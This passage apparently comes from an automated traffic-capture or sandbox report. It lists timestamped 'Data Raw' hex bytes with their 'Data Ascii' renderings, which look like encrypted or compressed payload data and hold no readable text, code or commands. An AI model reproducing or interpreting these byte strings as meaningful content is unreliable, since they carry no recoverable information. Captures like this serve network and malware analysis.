2f e8 d9 49 8c fa 7b 1b 49 5c b0 72 9a d6 3f bf 70 e9 82 bd 11 52 9f e6 97 0b 4a ca a4 52 3b ca c5 1d f0 92 a2 8b e8 27 1d d9 31 1c 31 d0 72 f8
                                                                                                              Data Ascii: JM|CkP%9&RjLq<GVJ.M#VLGvg@NE'Rz.)JFH`ax-N[P?)cUbKvs'E#CreY)!a-$NB#m]U>)a-nh/I{I\r?pRJR;'11r
                                                                                                              2021-11-24 14:07:32 UTC95INData Raw: 04 5a 17 10 d3 ca ca 14 93 56 b3 91 37 16 2c 30 b4 4d e7 69 fa 3c ff bf 16 d6 98 92 3f 53 26 24 71 73 b9 b5 22 b0 dd 81 ff 03 e9 88 24 64 d9 1f c0 87 53 e0 2c 62 8b 4e 82 02 6a 69 bd de 01 e5 ac 7e 7e 8b 88 ad 76 ff 72 b0 b6 03 b8 23 7a 40 95 d2 d5 e7 79 66 d1 7e 14 9b 1d 3d 7b 4e da e8 9b fd 6c 57 40 c0 16 65 e5 27 cc a9 36 f1 36 48 dc fb e7 0a 0f b4 07 71 d7 86 83 4e e5 7f 78 86 f6 0a c1 33 96 a8 48 05 a8 91 3f ff e2 e3 d8 c4 3f 25 a3 16 e0 d5 66 32 4a 1d e0 e1 f3 f5 c8 0c 17 6c b5 91 1b 57 36 5e 9f e0 28 29 da a7 9b 96 0a a5 79 8d 83 63 ec 37 b4 0e 2e cb 5b ad df 49 73 30 e3 c5 90 26 c2 3a f0 a2 2b 82 0d 64 7b 48 93 35 4e bf 36 25 d0 8b 4e 44 f4 43 5d de 30 15 45 d9 73 08 d9 f9 1f 35 19 1c 37 9a 6b 01 29 90 31 96 bd a7 29 1f c0 1e 64 a8 78 65 33 52 b7
                                                                                                              Data Ascii: ZV7,0Mi<?S&$qs"$dS,bNji~~vr#z@yf~={NlW@e'66HqNx3H??%f2JlW6^()yc7.[Is0&:+d{H5N6%NDC]0Es57k)1)dxe3R
                                                                                                              2021-11-24 14:07:32 UTC96INData Raw: d2 ec 23 90 c8 c7 b9 c3 5a 1c d4 aa 20 30 35 fd ca 05 95 08 9f 15 14 23 cd 0c 3a fe 6a a0 52 ad ef 2e 3b d8 08 74 9f b3 20 57 34 8e 7a e2 98 12 f0 76 8b 99 ee 0a 1a 55 1c 9e 7c a3 21 5b f1 e4 3a 18 d4 53 6d 56 b3 c1 db ba 9d db c3 d8 f9 f3 23 73 71 73 75 82 fd cb 3a 69 05 46 ed 8d c0 8d 0f ba 24 c4 86 70 5d 17 b9 47 bc 2c a8 d9 59 59 8c 25 2e d4 d3 9d df 1f d7 ce ce 24 25 19 5d 93 37 8a 9b c8 fc 15 63 04 61 5d 6d 22 dc 5b 8e d7 b8 16 7a 91 69 82 7d 20 72 4c 97 c1 92 81 38 f5 a5 46 a8 d9 00 3f 76 fa bf d8 24 7e 34 df eb 69 a8 3e e3 ab a3 56 88 69 34 b5 67 8d 57 82 75 90 9c 00 ea b5 a4 6a 3e 45 ba bc 2d e2 f4 7d 14 ee aa 4b 1e d5 70 b4 2e a8 6f b5 83 e9 fe 7c 58 fa 14 6e 29 98 f7 ea 0c f3 32 68 2a 8b 71 5d 48 53 d1 42 fd 56 41 1a 98 c7 51 d3 59 3c 6c c5 5f
                                                                                                              Data Ascii: #Z 05#:jR.;t W4zvU|![:SmV#sqsu:iF$p]G,YY%.$%]7ca]m"[zi} rL8F?v$~4i>Vi4gWuj>E-}Kp.o|Xn)2h*q]HSBVAQY<l_
                                                                                                              2021-11-24 14:07:32 UTC97INData Raw: 36 07 7d 0e ae 6a c6 08 1c a2 03 87 82 ed 74 b1 22 c8 15 4e 56 9f 76 f1 11 50 e9 5a b4 31 38 ca 85 2b d7 b0 71 4c be fd 7d a4 95 22 5d ee 02 1f 23 2c c2 3a f7 28 8a fa 0a 25 26 82 f0 e4 df 1e 12 bc 6b 3f 67 77 d3 19 1e ba e6 fb f7 98 be 74 26 05 b9 de 0e 53 c8 7c c5 9e 15 85 d1 99 2e 42 55 68 8a 6a c8 4c 5c 11 86 ce 7b f3 eb b8 9c ea 7e 24 4f e0 ea ae df 3a 41 ea c3 29 bb 91 ef f6 64 a3 88 a1 6f cd c0 1a f9 98 f7 c6 cd 62 22 95 e2 bb c2 b5 74 95 55 ce 93 ed 01 c2 b0 54 bd 1c bf c2 a6 66 a6 c8 39 da 34 58 4d 08 44 00 5b f5 27 d4 59 98 8b 74 a7 be 62 bc 06 ef 2c 74 14 b5 4f 50 bb fe 57 01 4b 6a 24 09 01 1c 58 33 1b 69 23 2c ac 63 38 91 43 6a 71 98 95 f5 ec 1b 7c 5a a5 0d 01 4e a2 ca f7 3d d4 31 43 dd 7c f3 24 7d c8 fd 44 5b 55 25 6a 1f 43 46 48 16 05 1c 48
                                                                                                              Data Ascii: 6}jt"NVvPZ18+qL}"]#,:(%&k?gwt&S|.BUhjL\{~$O:A)dob"tUTf94XMD['Ytb,tOPWKj$X3i#,c8Cjq|ZN=1C|$}D[U%jCFHH
                                                                                                              2021-11-24 14:07:32 UTC98INData Raw: ca f5 e1 63 11 b5 8c 22 6b 27 ad df 62 57 22 53 27 ce 32 1d 0f 83 b7 a8 da 19 61 f9 e8 73 c0 e0 a9 e0 82 c1 05 ba 1f 53 3f 95 6e cf ad 60 0c 32 14 ce 91 9c 2e 78 5a 14 ea 29 a4 a0 9a ec 24 de f5 b9 cd 2f b7 b7 2d e7 fc 17 87 1d f7 5b f5 32 31 da c1 40 b0 2f 04 73 7e fe e2 2b 56 b1 01 a2 8f cc 4b 79 53 46 8e f3 7e 2c bb 52 f2 4e b1 88 3a 2f 86 5f 0b 0e fa 0e 4c d2 11 56 23 e5 1b a6 ce de d6 99 c3 87 4a 5c 06 0c af 94 fe d0 56 a9 85 8f f7 01 90 ed 47 ac a1 40 63 3d 9f 62 9c c6 9e 90 6e b3 83 7a 0d 96 aa 80 83 48 2f b8 7c dc 3f 47 84 5d 04 3b bb 4c 0b 3a f9 a6 ea 8e 9e 68 ed 57 df e2 cf 5b ee 4e ab 90 b8 12 9c ee 4c 48 eb 0c 6d 0a 59 76 e5 a1 87 5e c7 f3 5f 2b 4a a5 16 98 34 a9 97 92 8e 00 84 48 47 94 69 1c 3c 41 e8 ee 66 f6 34 fe 1f a7 1d d6 67 56 99 32 45
                                                                                                              Data Ascii: c"k'bW"S'2asS?n`2.xZ)$/-[21@/s~+VKySF~,RN:/_LV#J\VG@c=bnzH/|?G];L:hW[NLHmYv^_+J4HGi<Af4gV2E
                                                                                                              2021-11-24 14:07:32 UTC99INData Raw: ca be dd 2a 86 9c 9a f2 ab 75 38 19 63 df 10 fe 60 a4 d2 ca 52 3d e6 04 e4 38 50 b8 05 47 3c 3c e0 91 43 30 68 fc 3d a1 cd 3b 90 1c 7a 6b a4 54 01 b3 55 fd 93 10 a6 ae 9e da ca 8e ee 40 b9 da 61 a0 b2 b0 eb 94 63 a9 8c bc 86 93 62 15 29 ca 6f 5e c6 1a c6 36 a2 51 cc 18 5d 5b 96 89 cd fe c2 d4 af 9f 0e dd 94 ba 6d a2 df 3d 64 cd b2 91 88 a8 c0 fb b7 48 13 df bb e0 66 e6 b6 65 7f b1 ed 85 86 2e 1c c0 16 a2 41 29 28 30 8a 93 6b 3a b9 30 3c 87 7a c3 1b 45 d0 2f 3b 2b 00 28 b1 f5 9d 01 64 59 8d d6 e9 a6 c6 31 5f 89 9c ca 04 51 ff 0a 21 f5 d5 a9 e0 fe fe 4e 30 49 2c d5 c6 4b 04 8a 07 29 6c d0 38 1b 01 02 d7 38 08 9a ae 7c 85 a1 88 95 7f 23 27 c2 f4 61 78 b7 52 62 b4 a7 6d 68 68 5f 82 ad ef e9 ad dd d4 86 2f c9 70 65 d8 0f a5 7f d6 ee 6e 23 84 bc f6 d0 57 39 11
                                                                                                              Data Ascii: *u8c`R=8PG<<C0h=;zkTU@acb)o^6Q][m=dHfe.A)(0k:0<zE/;+(dY1_Q!N0I,K)l88|#'axRbmhh_/pen#W9
                                                                                                              2021-11-24 14:07:32 UTC100INData Raw: e2 be 93 0f 9a 3a 41 71 ef f4 87 12 6c 63 21 c4 ed 9c 8f d8 57 aa a8 63 35 57 12 3c 96 4a 92 f4 14 f5 75 f6 23 ce 0c 80 6d 9c 83 2c a0 fb 42 f4 32 54 aa c3 e1 6b 46 ee 2b 60 96 31 bf d3 ca 82 62 96 5c 35 e9 57 7f b1 35 ee d8 72 5e dc d9 aa 0c 14 97 f0 1b 6b 2c cd ad 31 95 fd b2 0e 13 e2 ab 5a f8 c4 c3 7a 93 11 87 60 ce 88 a8 39 00 1a a8 15 c9 82 38 33 a3 18 b2 9a 6f 68 62 fb 6d b2 84 44 95 29 49 5e 7e e3 8b 73 d7 c2 cc 9d 74 27 a2 ce ee 9a a7 e6 2d 72 c3 94 11 5e 0b a0 34 1b 6e 44 fb ca a8 8c b7 e2 1a 9f cb 81 3c 34 ab e1 cf 3d ba ed 3f 15 09 be 9c 4a eb 26 02 d1 8c 25 3e 8c 3c a9 7f e1 f3 40 94 d3 42 2c 09 77 28 81 b5 22 40 c6 29 f2 2f 0f 34 3a 94 8e 35 d9 5f 19 40 26 b5 8f d4 20 23 42 64 48 f4 1f 6b ec f8 b9 92 b4 06 bc db b6 c6 cd 20 e7 78 f0 c3 0f 93
                                                                                                              Data Ascii: :Aqlc!Wc5W<Ju#m,B2TkF+`1b\5W5r^k,1Zz`983ohbmD)I^~st'-r^4nD<4=?J&%><@B,w("@)/4:5_@& #BdHk x
                                                                                                              2021-11-24 14:07:32 UTC102INData Raw: 9e 94 1e f4 4c fd 9d e1 7a e7 56 a5 ef 3c 1f 18 3b ad 73 e9 09 6e 83 a7 5d 1b 63 d3 e2 df 3e 18 1e 3e 15 68 2f 32 bc 4d ea 5c e5 38 a9 ef bf ea f5 eb ea 87 fd ec a9 66 a3 78 fe 97 32 c7 7a 37 ad 58 eb 40 84 72 54 e3 f0 06 ed 4c c2 c4 1c a5 fb 2f 99 ad c1 f5 20 cd 89 1a 48 19 b2 4f 52 0a 25 b7 39 12 f2 56 67 98 80 7b da 87 cf 55 95 5e b9 de 94 a4 c7 f7 6f c0 38 cb 3e 7c 06 c9 ea ae 82 57 12 f2 f2 c4 82 ed a4 ac 67 81 d6 d1 49 4b 3c 16 43 91 89 b6 fa bf ac 89 d0 f0 d3 0c 65 5c 3d 6d 76 bc 9d 24 95 1a 7e d8 dc 08 d1 52 09 04 75 70 be 29 ce 92 70 1d 53 ff ee c4 5d b5 06 f5 e9 69 78 ed 58 fb a7 70 12 51 29 aa 1d d0 d2 65 47 8f 3e ac e5 cd 4a 42 b7 10 41 65 2b 94 55 67 1d 19 d7 ce 7f c6 36 6f 8c bb 7f 24 e0 ee ba 9b e5 f8 72 2a cc 02 a1 fb aa 07 b2 ec 60 f1 62
                                                                                                              Data Ascii: LzV<;sn]c>>h/2M\8fx2z7X@rTL/ HOR%9Vg{U^o8>|WgIK<Ce\=mv$~Rup)pS]ixXpQ)eG>JBAe+Ug6o$r*`b
                                                                                                              2021-11-24 14:07:32 UTC103INData Raw: c3 ea f8 3a de ec 55 5b d5 9b a1 91 37 94 41 2d f1 69 42 32 b4 26 cc 7d 00 91 a2 07 99 c9 13 93 2d 67 0e f8 e5 57 53 cc fd 25 d8 15 a3 d6 e7 7c 36 f4 2a 92 0a c6 2f 98 cb 59 ce 2a fc 65 b0 e6 be 4e f0 5f e4 e4 e3 fe 75 9a 80 dc b2 98 6b b8 00 7b 62 41 45 11 a8 ad dd eb e0 2b 54 fc 6e 2b 71 03 86 fb 46 f6 fe e6 2d 70 9e ad 7a bb 28 3e 52 ee 70 23 42 0c 0d e0 e9 8b 23 78 ae 8f d5 33 d5 c6 ff b4 2b b6 c7 c9 49 3e 3c 3d ff 9e cd 4d ba 9b f6 0a de e7 8f d0 bd 84 12 ef 1f 1a 0d 67 c8 7f 59 0d 9f 4b e0 a8 fa 6c ef 4a 08 ae 0a ae 99 fd b1 a6 17 b0 b4 94 6d 04 86 65 1a af 70 d9 ce 35 98 d8 6e e6 1e bd cc 6c 86 92 33 57 61 f1 2a 19 a2 31 e2 86 4a cf af 34 dc bf b6 c2 b1 3a 14 d8 25 49 29 ce 8d 0c 24 c0 dc 53 43 55 22 10 08 8a 01 45 f3 0b d3 4f ac 21 02 6d f7 34 05
                                                                                                              Data Ascii: :U[7A-iB2&}-gWS%|6*/Y*eN_uk{bAE+Tn+qF-pz(>Rp#B#x3+I><=MgYKlJmep5nl3Wa*1J4:%I)$SCU"EO!m4
                                                                                                              2021-11-24 14:07:32 UTC104INData Raw: e3 8a a7 6f 4c bb fa bb 9e 6f c4 3e 67 b1 63 2e a2 f6 eb f1 94 5e eb 0f c4 aa 73 38 77 3f 79 22 ce 47 a9 2f 2e b1 c2 ae 43 19 16 24 c6 50 30 ac 80 74 0f cd 36 b7 77 b3 56 36 f0 bf ea a2 68 2b b4 be c0 92 b0 26 0a 15 e8 7b b3 e4 82 5f 52 27 e5 62 b2 b8 0a b3 8d b7 21 9f da 0a b0 22 3f 22 e0 4e b1 e4 3a a3 1d 58 61 c5 04 4a 85 53 9c d1 55 1f 29 34 09 a7 5c 9e 9c f6 e2 97 0d 51 9e 8e b1 c8 92 d4 b2 87 39 81 6c 51 ca 1d b0 c9 62 ca a9 8e b0 ef 51 7b a9 c8 cd 34 03 5d 13 ea 6a 61 5f 40 63 96 ca 50 46 0b e1 a0 a6 d1 c9 35 12 0f 54 a0 9c d8 22 9d b3 c5 72 dd fe d2 97 e2 c7 08 af 38 3a 0b f2 27 c4 94 90 b0 01 f8 14 a8 b3 31 40 b8 f8 a4 e3 d6 85 ba 27 e5 62 1d 9e a5 4a ce 2a a2 6e 13 87 7f 26 c8 44 ee 60 a0 93 45 83 7e 7b 5a 14 2a c5 7b 3e 82 33 d7 d4 dc 62 74 68
                                                                                                              Data Ascii: oLo>gc.^s8w?y"G/.C$P0t6wV6h+&{_R'b!"?"N:XaJSU)4\Q9lQbQ{4]ja_@cPF5T"r8:'1@'bJ*n&D`E~{Z*{>3bth
                                                                                                              2021-11-24 14:07:32 UTC106INData Raw: 34 45 18 5b 30 9a 95 65 d9 9a 00 d3 5c 0a 70 a1 d4 9b f4 d2 b1 da 58 f7 e2 a4 5d d1 92 08 64 ed a1 85 ef 2a 2b 43 0c 7d ce 09 96 44 07 0e 88 43 1f 68 84 9d 6d fd 94 8b 63 46 9e 7d 66 75 39 1e bb ae a2 02 97 8c e1 7a 5f 55 a5 ef aa b3 1c 59 af 73 62 4c fd 8e 89 05 12 63 82 de 19 10 20 24 3c 7f 68 45 da d8 2d 45 f2 e3 eb c1 ad 36 bf b8 b9 57 bf 02 13 fb eb c7 64 23 97 32 4c f3 5c 5d 2c 6e 9b e1 f7 a8 a1 7d 93 7f b1 57 3b c3 a6 d3 9e dc 52 54 7e 23 ea ed 26 07 9a 26 fa 92 7b 8c 18 90 05 db c1 f3 a1 c4 bf fe 0e d8 b1 26 de cc cf c4 74 8f 2b 74 c0 bb 8c fe f9 d9 ae 73 25 67 0a 81 91 57 8f d0 05 ba 0a c7 95 55 15 27 1b 3a 1e e3 90 89 bf 80 87 53 76 81 48 ba 0b 24 5c be c3 73 86 53 ec 14 6f 17 67 dc a6 78 e8 df 7d 62 23 2f af 6e 05 b4 05 5b aa 68 28 21 37 48 78
                                                                                                              Data Ascii: 4E[0e\pX]d*+C}DChmcF}fu9z_UYsbLc $<hE-E6Wd#2L\],n}W;RT~#&&{&t+ts%gWU':SvH$\sSogx}b#/n[h(!7Hx
                                                                                                              2021-11-24 14:07:32 UTC107INData Raw: e8 6c ba 86 be bb 64 27 b4 7f fe 87 e7 5c 9d 2d 27 b3 b7 52 58 6f 89 61 3d b6 b1 0f cb 0f d9 1a d0 a7 3f 04 6b dd 34 eb 6e 3f 83 13 17 37 1e 8c cc 89 46 63 69 fa 0b 99 35 28 1e 9e 7b 4a 62 2a 98 92 88 38 44 23 4f 09 c0 46 29 c8 e0 6d 1b 25 24 1c 31 9f 82 54 d2 72 7e 69 a7 ef 70 7f 93 84 e4 f1 07 eb 1f 16 7e 1c 8d ae d0 27 3a 01 2c e5 34 40 88 de 8b 61 87 ae a0 7e 87 8e 8a 73 98 07 ed f7 5e 8f 5c 1c 01 94 c8 cf 06 a5 75 16 f6 4f 7b 62 79 8b 21 1d eb b9 50 e6 d6 a3 53 89 81 fe 7d 3f 68 ff 9e 10 25 d2 1a e5 77 a6 0d 0a 5b a2 8e 78 23 d7 75 b2 2c 93 ff cb 41 9b 3d f6 e1 9c 13 4d 69 83 c0 d3 59 95 5e 84 c2 53 79 a3 12 63 50 07 3a 78 a0 8f 7e 3f 8b 79 66 99 c9 80 32 30 c5 97 30 b8 43 75 78 fd 0d 7b f2 08 ae 81 00 8c c6 8a 11 46 43 97 0c b8 dc 0b e8 c2 b0 a8 9e
                                                                                                              Data Ascii: ld'\-'RXoa=?k4n?7Fci5({Jb*8D#OF)m%$1Tr~ip~':,4@a~s^\uO{by!PS}?h%w[x#u,A=MiY^SycP:x~?yf200Cux{FC
                                                                                                              2021-11-24 14:07:32 UTC108INData Raw: d5 dc 8a 29 27 41 1e fc 82 27 a8 17 93 ea d8 7a 62 c4 11 af 6e 0d 25 e1 55 2c 02 b3 df b2 3c 68 76 51 1f be 5b 3c a6 70 8a 36 29 aa fc 9f ac a8 8f 12 4b c4 15 32 38 14 5f 19 3e 72 74 e2 24 38 8a dd ff 1e 53 3d a6 ea 74 cc ce c3 e0 32 c6 bf 90 06 8d a9 5a e6 5c 2c 1e 1a 31 28 ef a4 f0 c0 9e a4 78 ff 18 6e c5 db 26 fe 86 58 94 38 78 0b cc 91 8b 36 14 3e f3 e9 b1 95 69 ea 23 be 92 05 33 85 6a e0 38 25 fb 24 04 47 29 69 d7 9a 96 66 27 82 2a 7f 86 36 2d 01 01 0f f7 45 36 4b 2d 6d 49 fe b2 db 46 f5 73 b2 c1 d4 4b f0 f9 8f fa 6e 85 9d 6c de 90 26 b3 93 9a 24 a5 0d 51 96 9a 96 73 b4 81 52 6c dc 12 3b dc 6e ba 70 cb 32 47 b4 e1 13 e4 ad f3 c0 3e 8c 5b 6c 9e 41 67 d7 a4 53 28 b4 c0 3e d0 b7 a9 a1 97 a9 54 11 46 72 0f d9 5f 4d d3 f9 dc da 92 d4 55 76 26 26 fc 26 49
                                                                                                              Data Ascii: )'A'zbn%U,<hvQ[<p6)K28_>rt$8S=t2Z\,1(xn&X8x6>i#3j8%$G)if'*6-E6K-mIFsKnl&$QsRl;np2G>[lAgS(>TFr_MUv&&&I
                                                                                                              2021-11-24 14:07:32 UTC109INData Raw: 20 7b be 9c 2d bc 4e da 1a 74 f6 76 08 f8 d1 00 0d 6e 75 ee a7 26 d0 0e 7b 58 80 e6 41 9c 9b 74 cf 22 b3 bd 33 25 51 b5 95 b4 e7 4c 7e 0d 67 3c e2 b8 37 db d8 6e fd 79 1f c0 84 32 fb 6c b0 5f 05 10 d2 b6 5d c9 7d 52 5a d4 57 95 15 f2 65 c0 42 3a 97 3d b2 d3 85 93 7b 06 25 cc 55 a7 56 d0 ca c3 72 42 e6 8f ef ff dc 25 a8 f9 b9 6b c1 90 78 d2 f7 7b 97 17 1a ea a5 ef 33 6e 1f 40 c3 d4 5a 8e 4d 97 57 39 eb 94 ef 42 9b b6 4f a1 b3 bb 21 62 5c f5 55 8c 0c 17 32 09 ba 4a 2a df 9f 61 48 ab 36 91 94 13 6c c2 3b 35 e5 70 fa e2 f3 36 02 2d 68 04 91 eb 7e cd 89 6b 39 c7 2b 89 c9 f4 ef 50 ee 73 b5 f4 69 18 50 a0 b6 76 42 70 d7 d8 e4 d9 28 2e ff 92 4f 44 15 59 08 a1 ec 11 1e 1d c9 d3 33 f8 ca e4 6e ea 8f 0c 71 36 e6 16 32 96 87 74 0d fb 05 c0 ea 82 8a f1 8e f1 2d f8 d2
                                                                                                              Data Ascii: {-Ntvnu&{XAt"3%QL~g<7ny2l_]}RZWeB:={%UVrB%kx{3n@ZMW9BO!b\U2J*aH6l;5p6-h~k9+PsiPvBp(.ODY3nq62t-
                                                                                                              2021-11-24 14:07:32 UTC111INData Raw: 0e eb 23 34 49 ed 10 76 a4 d2 fd 5d 6c 78 46 ab 01 a8 b0 51 37 c3 d0 20 b3 74 6b 78 39 ee fc 91 92 c7 8e 0c f2 71 7c ef 4e bb 01 7b 5f ff cf ed ed 03 a2 16 38 d8 14 36 27 86 3d 2e 31 d1 67 7d 7b 29 23 86 50 10 8d 23 eb 35 a8 fd 5a 9f 26 37 09 2e fd f7 c1 1c be 34 62 34 70 72 84 53 c3 e7 98 ba bf 69 de 14 88 da 97 2a 86 57 52 49 54 07 15 e6 9e d1 05 a2 a3 cd 4b 9c d8 4b 29 d1 be ec 28 ca a2 5e 8e 8a f9 3c cf 1a 62 3f 57 82 37 b1 0b 82 3a 4a be a6 d8 00 2a 7b 23 26 12 f0 0c 50 5c 73 7e 8b 07 eb d8 84 7a 55 b9 89 2e 6d e1 f3 7f 19 65 89 62 c3 cd 44 d6 2e 1b cb 02 11 10 3c 10 fa 22 e4 e3 a8 ae 3c 7c 85 e3 15 75 35 fb 0f 9b 90 69 62 c6 52 0d e6 30 ad f6 a9 ad b3 65 5b 2c 8f fb 95 ed d2 a6 38 dd 76 45 67 10 b3 86 bb 37 8c b1 5c e5 f3 85 63 97 21 23 c2 82 37 54
                                                                                                              Data Ascii: #4Iv]lxFQ7 tkx9q|N{_86'=.1g}{)#P#5Z&7.4b4prSi*WRITKK)(^<b?W7:J*{#&P\s~zU.mebD.<"<|u5ibR0e[,8vEg7\c!#7T
                                                                                                              2021-11-24 14:07:32 UTC112INData Raw: 4b c6 66 f7 cb 78 e4 4b f0 d4 04 59 ad f1 4e 46 0f c9 7f a4 44 8f 48 f8 5a b1 1d 09 b4 25 25 ca 5b 14 70 03 d6 0f 5d 47 33 c7 95 80 81 cb 9d b7 5b eb 4b 51 2a 4b 3d b8 02 9d b0 b8 ff 34 0e b6 52 7b 86 53 af 49 b0 7d f7 7d 04 44 52 27 e0 61 52 76 60 c6 13 e3 a6 53 3f 9d d4 29 0f 5c f3 2d 5d 49 86 5c aa 7b 28 c6 1b 29 aa 21 81 50 b5 cc 1a c6 db 4f 26 93 51 4f c0 23 96 57 db cb 95 82 0f 87 1c 44 28 e5 b7 b7 12 0b 37 3b 26 26 29 ca f5 24 40 96 bb 82 74 32 0e 31 28 32 a2 0c f6 ca 4c 72 66 b2 9d cd 19 a9 d2 34 17 6b e8 ad 86 84 eb f9 57 73 6d d0 a5 ad 49 b7 ea 29 0f 76 37 76 8d e1 b0 58 5e c9 4d f0 f9 b6 0f 64 47 d6 66 a6 e8 63 28 ab be 32 1a 60 53 4c 19 ca 4c 4c 85 69 20 f6 aa 5c 6d 3d 0f 2e 46 ea 87 ed 63 53 03 49 ef b1 66 6f 20 a5 8c 9b be d0 16 da 58 56 36
                                                                                                              Data Ascii: KfxKYNFDHZ%%[p]G3[KQ*K=4R{SI}}DR'aRv`S?)\-]I\{()!PO&QO#WD(7;&&)$@t21(2Lrf4kWsmI)v7vX^MdGfc(2`SLLLi \m=.FcSIfo XV6
                                                                                                              2021-11-24 14:07:32 UTC113INData Raw: 0b 13 12 41 49 40 9c d3 8f 32 a3 eb 03 10 a4 81 61 6f e6 43 a3 1a cf cd dd 74 c3 12 3c f6 9d 32 4a 71 14 3c 61 6b de 82 68 26 6b fb fb 97 bb 15 e9 11 c9 7f 4f 98 97 ab 58 d1 85 03 1f d7 da 3d d3 2b 77 c4 78 57 3d b7 d2 aa 9e 09 50 7e 17 d3 60 23 b9 c4 8b 3d 7a c1 3e 14 be 95 b0 60 db 60 22 08 c3 38 b1 75 9f 3d c0 f4 ad 1a 53 bb 9c 2f 13 a2 31 d8 4c fa a3 47 e0 72 cd 04 b9 24 ff eb 23 84 e1 3e 54 98 26 e0 aa f8 8e 52 99 1e 29 ef 4e a8 14 b4 0f 6b 74 d4 06 0a f8 2e 32 ba c8 10 1f df d9 23 5f 23 d9 61 0a b9 8d 03 09 62 8e 3f 6c 06 90 02 e8 c8 a3 5d 7d 11 38 48 fe 1c c1 e1 61 27 bd 8a 3b 1f 99 57 a5 ef 91 77 74 20 47 0e 14 f6 1a 6f 2a 1f 4c 8b f6 49 e7 85 4a 60 69 42 80 44 27 4d 82 7f 8c 38 e9 e1 99 42 15 87 fd d6 33 68 23 ad bc c7 16 c4 68 cd ad 1a 89 ce f4
                                                                                                              Data Ascii: AI@2aoCt<2Jq<akh&kOX=+wxW=P~`#=z>``"8u=S/1LGr$#>T&R)Nkt.2#_#ab?l]}8Ha';Wwt Go*LIJ`iBD'M8B3h#h
                                                                                                              2021-11-24 14:07:32 UTC114INData Raw: 42 15 58 d9 ec c7 8f c7 bb 94 1a 40 6f 6a 86 b5 6f cd 01 8f 02 74 f2 26 40 2a b8 c3 65 e8 71 bf 68 1b a3 17 f8 4e 50 9b e2 e5 37 13 37 0a 2e 65 c1 26 31 3b 81 46 0a 27 96 b6 fe a2 91 8b 1c 1e a8 8c a6 88 25 97 24 4b 7a 30 13 3e 0e 99 51 d9 25 d0 d3 d4 7d a0 c6 9f ca e9 2d 5b 74 29 94 c4 99 66 7e ca 54 3d 9c 13 88 46 23 47 11 d2 7f f0 7c 8d 55 a7 a5 37 94 0c 90 65 60 a0 c0 b3 14 35 41 43 23 d2 e5 9e 9e a2 81 e8 32 30 61 84 2f 20 91 d3 d6 4d 84 17 3d db 4b 16 1a 1d 16 c1 e5 b3 8d f2 86 27 5c 95 6b ed 98 78 f2 ee d6 80 aa 04 af a7 fe 62 67 c5 75 c5 1f 34 45 1c 57 76 a3 95 3e 86 2c 00 82 53 e0 2c 62 5f 46 a5 90 bc a7 80 d3 2a 83 f0 f5 92 83 29 0d ab fc fe ad 2a 32 7b b6 bd 76 2d 80 7a 75 26 be 51 25 7c 5a 28 19 7f 4b 67 15 71 ff 2b f7 16 50 05 63 72 3b d1 57
                                                                                                              Data Ascii: BX@ojot&@*eqhNP77.e&1;F'%$Kz0>Q%}-[t)f~T=F#G|U7e`5AC#20a/ M=K'\kxbgu4EWv>,S,b_F*)*2{v-zu&Q%|Z(Kgq+Pcr;W
                                                                                                              2021-11-24 14:07:32 UTC115INData Raw: c1 ae 5d c2 e8 db ce d9 28 99 cb 16 42 c6 25 00 c2 f3 f6 43 e3 b1 43 32 b3 8e f6 c6 7b 95 6d 01 90 15 8d 95 3c 1a 7d 2b 7d d2 34 4e 56 c6 11 11 c5 36 7c 99 b3 1f a2 c1 c1 72 b1 f5 3f 45 ac ec 9e 9c 21 c3 64 f2 b8 60 36 30 b9 cc 03 b9 89 f8 bb 61 9c 1e c3 e4 3d d8 58 b6 36 e5 c1 5f fa 8b 58 b4 cb 96 8f 62 70 cb 32 47 af 2f b6 9b ee 26 c8 40 e0 40 a9 de c5 a7 15 96 9a ad ed e1 c7 d3 b3 a0 a5 d0 a1 5a 21 06 49 c5 26 d0 d7 3f 2f 08 22 8b 67 9b 42 88 79 02 f8 97 ce 02 6e 00 f3 27 2c 51 9d d8 02 7a d4 aa 6e e3 5d d5 d6 a4 76 5b 80 e4 f0 f9 96 f1 9e 5a ca aa 2d a2 6e 1d c6 97 bc 96 a3 be ed ed 80 54 5b b2 1e 59 60 ea 6c 68 3d 66 b6 a2 d3 e4 4d 9c e5 2f cd 31 d8 a7 63 97 43 9e 0e 39 10 f6 4d b5 86 f4 bd ae e6 e4 8e 89 fb a8 db b3 d8 4b a2 84 19 21 5d b2 a4 9e 5e
                                                                                                              Data Ascii: ](B%CC2{m<}+}4NV6|r?E!d`60a=X6_Xbp2G/&@@Z!I&?/"gByn',Qzn]v[Z-nT[Y`lh=fM/1cC9MK!]^
                                                                                                              2021-11-24 14:07:32 UTC116INData Raw: 87 8a df da 23 d1 1a 01 9c b5 8a 3e 0d 1b 79 f7 17 4b 8f 1c 2b c7 91 9c d2 bf 07 dd ea 51 c7 8a 84 5c 1d aa 5a 78 53 59 22 77 22 f6 a1 f4 1a fa 57 1e f3 da 80 b4 18 f9 e4 5a 60 4b 5b ef 81 39 98 48 60 17 7e 9f fd b2 82 ce e4 a3 ec 14 e1 72 be a4 ac b2 d2 3e 42 eb aa 9d 2f 2b 1d 2d ca 73 fb 7d 93 73 89 35 4e bc 78 5b f0 37 6e 3f 2e eb 6d 9d 6f ae 11 23 7f 89 06 df c0 b6 d1 a1 2b 7a d3 43 f0 96 86 e5 be 6b 97 f3 d6 2f 23 67 e3 6f 9e e6 cc 88 ea a8 ba 44 93 ae 18 c1 a0 89 61 5c b8 a4 d6 96 c6 81 5a 5e 47 34 a4 9f d7 bc 7f 9a 78 ac ef e9 a7 4e 36 af 03 01 04 a8 57 e3 f9 5d e2 82 53 2b 06 b4 7a d4 a0 6f d2 f6 24 3d d6 fb 58 d6 3c 54 6a f2 a2 91 7b 65 51 94 a7 08 70 06 c9 e8 fa 10 a8 77 d1 33 70 9e 48 91 06 f2 cc 19 14 5f 78 bc a9 14 9c 1f db 80 4c 2b 2b 80 b9
                                                                                                              Data Ascii: #>yK+Q\ZxSY"w"WZ`K[9H`~r>B/+-s}s5Nx[7n?.mo#+zCk/#goDa\Z^G4xN6W]S+zo$=X<Tj{eQpw3pH_xL++
